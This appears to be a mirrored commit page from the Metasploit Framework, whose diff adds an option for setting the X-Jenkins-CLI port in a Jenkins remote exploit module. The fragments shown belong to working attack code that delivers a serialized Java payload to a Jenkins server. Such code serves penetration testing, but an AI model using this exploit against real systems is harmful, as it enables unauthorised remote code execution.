1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00

Land #6549, module option for X-Jenkins-CLI-Port

This commit is contained in:
William Vu 2016-02-10 10:34:33 -06:00
commit 5b3fb99231
No known key found for this signature in database
GPG Key ID: 68BD00CE25866743

View File

@ -52,10 +52,18 @@ class Metasploit3 < Msf::Exploit::Remote
OptString.new('TEMP', [true, 'Folder to write the payload to', '/tmp']),
Opt::RPORT('8080')
], self.class)
register_advanced_options([
OptPort.new('XJenkinsCliPort', [false, 'The X-Jenkins-CLI port. If this is set, the TARGETURI option is ignored.'])
], self.class)
end
def cli_port
@jenkins_cli_port || datastore['XJenkinsCliPort']
end
def exploit
unless vulnerable?
if cli_port == 0 && !vulnerable?
fail_with(Failure::Unknown, "#{peer} - Jenkins is not vulnerable, aborting...")
end
invoke_remote_method(set_payload)
@ -155,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote
def invoke_remote_method(serialized_java_stream)
begin
socket = connect(true, {'RPORT' => @jenkins_cli_port})
socket = connect(true, {'RPORT' => cli_port})
print_status 'Sending headers...'
socket.put(read_bin_file('serialized_jenkins_header'))